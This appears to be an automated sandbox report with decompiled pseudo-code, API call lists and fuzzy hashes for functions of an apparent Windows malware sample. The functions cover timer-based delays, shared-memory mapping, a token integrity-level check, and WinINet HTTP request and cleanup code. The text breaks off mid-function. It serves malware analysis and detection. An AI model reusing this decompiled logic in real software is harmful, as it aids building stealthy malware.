0x00000000
0x00000000
0x02b8818c
0x00000000
0x02b88172
0x02b88160
0x02b8815b
0x02b880a1
0x02b880a8
0x02b880b8
0x02b880bb
0x02b880c1
0x02b880c5
0x02b88108
0x02b88114
0x02b8813d
0x02b88116
0x02b8811a
0x02b88120
0x02b88128
0x02b8812a
0x02b8812d
0x02b88133
0x02b88135
0x02b88135
0x02b88128
0x02b8811a
0x00000000
0x02b88114
0x02b880cd
0x02b880d0
0x02b880d7
0x02b880e7
0x02b880ea
0x02b880fa
0x00000000
0x02b88100
0x02b880e1
0x02b880e5
0x00000000
0x00000000
0x00000000
0x02b880e5
0x02b880b2
0x02b880b6
0x00000000
0x00000000
0x00000000
0x02b880b6
0x02b8808f
0x02b88093
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02B8803E
LoadLibraryA.KERNELBASE(?), ref: 02B880BB
GetLastError.KERNEL32 ref: 02B880C7
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02B880FA

Strings

$, xrefs: 02B88013

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 93a19520f573fada668f8bd9a7c0656200f4a260195373480f8a7d8bd7975b96
Instruction ID: 99d0ca96c0772d2fcce839b8e1746c9638b7074d8a83dd4041d7c6c4061826f6
Opcode Fuzzy Hash: 93a19520f573fada668f8bd9a7c0656200f4a260195373480f8a7d8bd7975b96
Instruction Fuzzy Hash: BF813A71A40609AFDB20EF98D880BAEB7F5FF48750F548469E909E7340EB70E985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B86815 Relevance: 16.7, APIs: 11, Instructions: 151
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E02B86815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2b8a2e0);
					_v76 = 0;
					_v80 = 0;
					L02B882DA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x2b8a30c; // 0x1c8
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2b8a2ec = 5;
						} else {
							_t69 = E02B85251(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x2b8a300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E02B835D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E02B869E6(_t75,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2b8a2e4);
							goto L21;
						} else {
							__eflags =  *0x2b8a2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E02B863F6();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2b8a2e8);
								L21:
								L02B882DA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x2b8a2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

0x02b86815
0x02b8682b
0x02b8682f
0x02b86834
0x02b8683b
0x02b86841
0x02b86847
0x02b869ce
0x02b8684d
0x02b8684d
0x02b8684f
0x02b86854
0x02b86855
0x02b8685b
0x02b8685f
0x02b86863
0x02b86871
0x02b8687f
0x02b86883
0x02b86885
0x02b86892
0x02b8689e
0x02b868a0
0x02b868a6
0x02b868af
0x02b868ba
0x02b868ba
0x02b868b1
0x02b868b1
0x02b868b8
0x00000000
0x00000000
0x02b868b8
0x02b868c4
0x00000000
0x02b868c8
0x02b868cd
0x02b868d8
0x02b868d8
0x02b868e0
0x02b868e6
0x02b868ee
0x02b868f7
0x02b868fe
0x02b86902
0x02b86907
0x02b8690d
0x00000000
0x00000000
0x02b8690f
0x02b86913
0x02b8691a
0x00000000
0x02b8691c
0x02b8692c
0x02b8692c
0x00000000
0x02b8695d
0x02b8695d
0x02b86962
0x02b86981
0x02b86983
0x02b86988
0x02b86989
0x00000000
0x02b86964
0x02b86964
0x02b8696a
0x00000000
0x02b8696c
0x02b8696c
0x02b86971
0x02b86973
0x02b86978
0x02b86979
0x02b8698f
0x02b8698f
0x02b86997
0x02b869a5
0x02b869a9
0x02b869b5
0x02b869b7
0x02b869bb
0x02b869bd
0x00000000
0x02b869c3
0x00000000
0x02b869c3
0x02b869bd
0x02b8696a
0x00000000
0x02b86962
0x02b86930
0x02b86932
0x02b86936
0x02b86937
0x02b86937
0x02b8693b
0x02b86945
0x02b86945
0x02b8694b
0x02b8694e
0x02b8694e
0x02b86955
0x02b86955
0x02b869dc
0x00000000

APIs

memset.NTDLL ref: 02B8682F
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02B8683B
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02B86863
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02B86883
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,02B826E9,?), ref: 02B8689E
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,02B826E9,?,00000000), ref: 02B86945
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02B826E9,?,00000000,?,?), ref: 02B86955
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02B8698F
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 02B869A9
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02B869B5

Part of subcall function 02B85251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05589228,00000000,?,74AD3E00,00000000,74AD3E20), ref: 02B852A0
Part of subcall function 02B85251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05589170,?,00000000,30314549,00000014,004F0053,05589280), ref: 02B8533D
Part of subcall function 02B85251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02B868B6), ref: 02B8534F

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02B826E9,?,00000000,?,?), ref: 02B869C8

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 7c7f15d0b72b0d38e3fb754f21ce577c0e02bf8553c34b18e2dbdc8a27a66fff
Instruction ID: f57cdd9cc4a752630e6350e40bdc650e3dc92bf09fcb862dacb39f66ff40714d
Opcode Fuzzy Hash: 7c7f15d0b72b0d38e3fb754f21ce577c0e02bf8553c34b18e2dbdc8a27a66fff
Instruction Fuzzy Hash: 37518A71808320AFC720AF15CC44DABBBECEB89364F508A5AF9AD92290D770D554CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02B8415A Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E02B8415A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02B882D4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2b8a348; // 0x29fd5b8
				_t5 = _t13 + 0x2b8b7b4; // 0x5588d6c
				_t6 = _t13 + 0x2b8b644; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02B87F3A();
				_t17 = CreateFileMappingW(0xffffffff, 0x2b8a34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x02b8415a
0x02b84162
0x02b84166
0x02b8416c
0x02b84171
0x02b84176
0x02b84179
0x02b8417c
0x02b84181
0x02b84182
0x02b84185
0x02b8418a
0x02b84191
0x02b8419b
0x02b8419d
0x02b8419e
0x02b841a1
0x02b841bd
0x02b841c3
0x02b841c7
0x02b84215
0x02b841c9
0x02b841d6
0x02b841e6
0x02b841ee
0x02b84200
0x02b84204
0x00000000
0x00000000
0x02b841f0
0x02b841f3
0x02b841f8
0x02b841fa
0x02b841fa
0x02b841d8
0x02b841da
0x02b84206
0x02b84207
0x02b84207
0x02b841d6
0x02b8421c

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,02B825B1,?,?,4D283A53,?,?), ref: 02B84166
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02B8417C
_snwprintf.NTDLL ref: 02B841A1
CreateFileMappingW.KERNELBASE(000000FF,02B8A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 02B841BD
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02B825B1,?,?,4D283A53,?), ref: 02B841CF
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 02B841E6
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,02B825B1,?,?,4D283A53), ref: 02B84207
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02B825B1,?,?,4D283A53,?), ref: 02B8420F

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: ef8c49037ec0c810801df0198bcc90101fd638367234001720e66443a17dbcec
Instruction ID: 640139e5f7ec382a2d54fbe02a09c3fe75984a1367a23c66c24f22171681f445
Opcode Fuzzy Hash: ef8c49037ec0c810801df0198bcc90101fd638367234001720e66443a17dbcec
Instruction Fuzzy Hash: D221A272A80605BBDB11FF64CC05FAE77B9AB84794F210061F60EE7290DB709915CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02B84BE7 Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E02B84BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E02B816B2(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E02B861DA(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E02B861DA(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E02B861DA(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E02B861DA(_t46);
				}
				return _t24;
			}

0x02b84be7
0x02b84be7
0x02b84be9
0x02b84beb
0x02b84bf2
0x02b84bf9
0x02b84bf9
0x02b84bfe
0x02b84c01
0x02b84c08
0x02b84c11
0x02b84c15
0x02b84c1a
0x02b84c1a
0x02b84c1c
0x02b84c21
0x02b84c25
0x02b84c2a
0x02b84c2a
0x02b84c2c
0x02b84c31
0x02b84c35
0x02b84c3a
0x02b84c3a
0x02b84c3c
0x02b84c47
0x02b84c4a
0x02b84c4a
0x02b84c4c
0x02b84c51
0x02b84c54
0x02b84c54
0x02b84c56
0x02b84c5d
0x02b84c60
0x02b84c65
0x02b84c68
0x02b84c68
0x02b84c6b
0x02b84c70
0x02b84c73
0x02b84c73
0x02b84c78
0x02b84c7c
0x02b84c7f
0x02b84c7f
0x02b84c84
0x02b84c89
0x00000000
0x02b84c8c
0x02b84c93

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 02B84C15
InternetCloseHandle.WININET(?), ref: 02B84C1A
InternetSetStatusCallback.WININET(?,00000000), ref: 02B84C25
InternetCloseHandle.WININET(?), ref: 02B84C2A
InternetSetStatusCallback.WININET(?,00000000), ref: 02B84C35
InternetCloseHandle.WININET(?), ref: 02B84C3A
CloseHandle.KERNEL32(?,00000000,00000102,?,?,02B82248,?,?,74ACE5D0,00000000,00000000), ref: 02B84C4A
CloseHandle.KERNEL32(?,00000000,00000102,?,?,02B82248,?,?,74ACE5D0,00000000,00000000), ref: 02B84C54

Part of subcall function 02B816B2: WaitForMultipleObjects.KERNEL32(00000002,02B87C47,00000000,02B87C47,?,?,?,02B87C47,0000EA60), ref: 02B816CD

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
String ID:
API String ID: 2824497044-0
Opcode ID: 8d3c7e502f3b1997fa29d24406c64d21bbaf7f8c732c8999da8c2291db20e253
Instruction ID: 94962aeef0c3a5ad4ba81cf0ba64522f7d396ee42f04ceacbe40af3c593f40b2
Opcode Fuzzy Hash: 8d3c7e502f3b1997fa29d24406c64d21bbaf7f8c732c8999da8c2291db20e253
Instruction Fuzzy Hash: FD113A76A00659ABC630BFAADD84C2BB7FEFB442083550D59E18DD3611CB24F885CE60

Uniqueness

Uniqueness Score: -1.00%

Function 02B6003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02B6024D

Strings

kernel32.dll, xrefs: 02B6008F, 02B60095
cess, xrefs: 02B6018D

Memory Dump Source

Source File: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b60000_server.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 7e49fe31287680808b82267f3dcc156eef48a6d2a385437ee5c91d13821aa129
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 74527974A01229DFDB64CF59C984BACBBB1BF09304F1484E9E94DAB351DB34AA84CF14

Uniqueness

Uniqueness Score: -1.00%

Function 02B85E40 Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02B85E40(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2b8a2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02B833DC(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02B861DA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x02b85e4d
0x02b85e54
0x02b85e5b
0x02b85e6f
0x02b85e7a
0x02b85e92
0x02b85e9f
0x02b85ea2
0x02b85ea7
0x02b85eb2
0x02b85eb6
0x02b85ec5
0x02b85ec9
0x02b85ee5
0x02b85ee5
0x02b85ee9
0x02b85ee9
0x02b85eee
0x02b85ef2
0x02b85ef8
0x02b85ef9
0x02b85f00
0x02b85f06

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02B85E72
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02B85E92
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02B85EA2
CloseHandle.KERNEL32(00000000), ref: 02B85EF2

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02B85EC5
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02B85ECD
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02B85EDD

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: be3b87219cac01917b1dabffe1b892dbfcd72784bae72ba36a4c240e765dc27b
Instruction ID: eb962892f5f033d16e36985ee3c333a6d3c1e5edc373daea1dacf2bf5b2877a9
Opcode Fuzzy Hash: be3b87219cac01917b1dabffe1b892dbfcd72784bae72ba36a4c240e765dc27b
Instruction Fuzzy Hash: CB215C75D00209FFEB10EF90CC84EEEBBB9EB48345F1000A6E914A7191CB718A55EF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B86675 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E02B86675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2b8a348; // 0x29fd5b8
				_t1 = _t9 + 0x2b8b516; // 0x253d7325
				_t36 = 0;
				_t28 = E02B85815(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x5589611
					_t40 = E02B833DC(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E02B85063(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E02B861DA(_t40);
						_t42 = E02B84AC7(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02B861DA(_t36);
							_t36 = _t42;
						}
						_t43 = E02B82708(_t36, _t33);
						if(_t43 != 0) {
							E02B861DA(_t36);
							_t36 = _t43;
						}
					}
					E02B861DA(_t28);
				}
				return _t36;
			}

0x02b86675
0x02b86678
0x02b86679
0x02b86680
0x02b86687
0x02b8668e
0x02b86692
0x02b86699
0x02b866a0
0x02b866a5
0x02b866ad
0x02b866b7
0x02b866bb
0x02b866bf
0x02b866c5
0x02b866ca
0x02b866d4
0x02b866da
0x02b866dc
0x02b866f3
0x02b866f7
0x02b866fa
0x02b866ff
0x02b866ff
0x02b86708
0x02b8670c
0x02b8670f
0x02b86714
0x02b86714
0x02b8670c
0x02b86717
0x02b8671c
0x02b86722

APIs

Part of subcall function 02B85815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B8668E,253D7325,00000000,00000000,?,7625E910,02B83ECE), ref: 02B8587C
Part of subcall function 02B85815: sprintf.NTDLL ref: 02B8589D

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7625E910,02B83ECE,00000000,05589610), ref: 02B866A0
lstrlen.KERNEL32(00000000,?,7625E910,02B83ECE,00000000,05589610), ref: 02B866A8

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

strcpy.NTDLL ref: 02B866BF
lstrcat.KERNEL32(00000000,00000000), ref: 02B866CA

Part of subcall function 02B85063: lstrlen.KERNEL32(00000000,00000000,02B83ECE,00000000,?,02B866D9,00000000,02B83ECE,?,7625E910,02B83ECE,00000000,05589610), ref: 02B85074

Part of subcall function 02B861DA: RtlFreeHeap.NTDLL(00000000,00000000,02B86383,00000000,?,00000000,00000000), ref: 02B861E6

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02B83ECE,?,7625E910,02B83ECE,00000000,05589610), ref: 02B866E7

Part of subcall function 02B84AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,02B866F3,00000000,?,7625E910,02B83ECE,00000000,05589610), ref: 02B84AD1
Part of subcall function 02B84AC7: _snprintf.NTDLL ref: 02B84B2F

Strings

=, xrefs: 02B866E1

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: ea4e8ed8b086d9db5b5b2d164939e326e12e16f473abc53e502f94e08f7a59ff
Instruction ID: 8d953ef71ab44b031144f472e174c3b9f9fc427ec16256e23fd9322125b7feb8
Opcode Fuzzy Hash: ea4e8ed8b086d9db5b5b2d164939e326e12e16f473abc53e502f94e08f7a59ff
Instruction Fuzzy Hash: 4C117337D01625AB8A12BF789C84CBE37AE9F457943054496F90CA7202DF74DD02DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02B851D8 Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02B851D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02B82058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02B87B83(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x02b851d8
0x02b851e5
0x02b851e7
0x02b8524a
0x00000000
